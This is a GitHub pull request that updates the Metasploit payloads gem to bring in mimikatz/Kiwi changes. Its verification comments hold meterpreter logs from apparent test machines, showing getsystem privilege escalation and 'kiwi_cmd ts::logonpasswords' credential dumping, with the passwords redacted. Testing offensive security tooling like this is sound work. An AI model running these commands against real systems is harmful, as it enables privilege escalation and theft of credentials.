Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update metasploit payloads gem to 2.0.48 #15440

Merged
merged 1 commit into from
Jul 16, 2021
Merged

Update metasploit payloads gem to 2.0.48 #15440

merged 1 commit into from
Jul 16, 2021

Conversation

bwatters-r7
Copy link
Contributor

@bwatters-r7 bwatters-r7 commented Jul 16, 2021
edited
Loading

This PR updates the payloads gem version to 2.0.48 to bring in the updates to mimikatz in rapid7/mimikatz#5 and rapid7/metasploit-payloads#490

Verification

List the steps needed to make sure this thing works

@bwatters-r7 bwatters-r7 self-assigned this Jul 16, 2021
@bwatters-r7
Copy link
Contributor Author 

[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > kiwi_cmd privilege::debug ts::logonpasswords
[-] The "kiwi_cmd" command requires the "kiwi" extension to be loaded (run: `load kiwi`)
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > kiwi_cmd privilege::debug ts::logonpasswords
Privilege '20' OK

mimikatz(powershell) # ts::logonpasswords
!!! Warning: false positives can be listed !!!

   Domain      : 
   UserName    : msfuser
   Password/Pin: [redacted]

meterpreter >

@bwatters-r7
Copy link
Contributor Author

I could not get it to work on Windows 7x86, but I could on Windows 10x86. I'm unclear as to why, but there appear to be no regressions, and clearly the new features are present/

[*] Starting interaction with 9...

meterpreter > sysinfo
Computer        : WIN7X86-SP0
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN7X86-SP0\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > kiwi_cmd privilege::debug ts::logonpasswords
Privilege '20' OK

mimikatz(powershell) # ts::logonpasswords
!!! Warning: false positives can be listed !!!

meterpreter > netstat

Connection list
===============

    Proto  Local address                    Remote address         State        User  Inode  PID/Program name
    -----  -------------                    --------------         -----        ----  -----  ----------------
    tcp    0.0.0.0:135                      0.0.0.0:*              LISTEN       0     0      720/svchost.exe
    tcp    0.0.0.0:445                      0.0.0.0:*              LISTEN       0     0      4/System
    tcp    0.0.0.0:3389                     0.0.0.0:*              LISTEN       0     0      1220/svchost.exe


meterpreter > sysinfo
Computer        : DESKTOP-M9INQAQ
OS              : Windows 10 (10.0 Build 15063).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-M9INQAQ\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > kiwi_cmd privilege::debug ts::logonpasswords
[-] The "kiwi_cmd" command requires the "kiwi" extension to be loaded (run: `load kiwi`)
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > kiwi_cmd privilege::debug ts::logonpasswords
Privilege '20' OK

mimikatz(powershell) # ts::logonpasswords
!!! Warning: false positives can be listed !!!

   Domain      : 
   UserName    : msfuser
   Password/Pin: [redacted]

meterpreter >

@bwatters-r7 bwatters-r7 merged commit 4f6b6e4 into rapid7:master Jul 16, 2021
@bwatters-r7
Copy link
Contributor Author

Release Notes

This PR updates the payloads gem to include updates to Kiwi. For more information, see rapid7/mimikatz#5 and rapid7/metasploit-payloads#490

@bwatters-r7 bwatters-r7 added the rn-enhancement release notes enhancement label Jul 16, 2021
@bwatters-r7 bwatters-r7 deleted the update-payloads-2.0.48 branch October 5, 2021 19:47
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@bwatters-r7 bwatters-r7

Labels
rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
1 participant
@bwatters-r7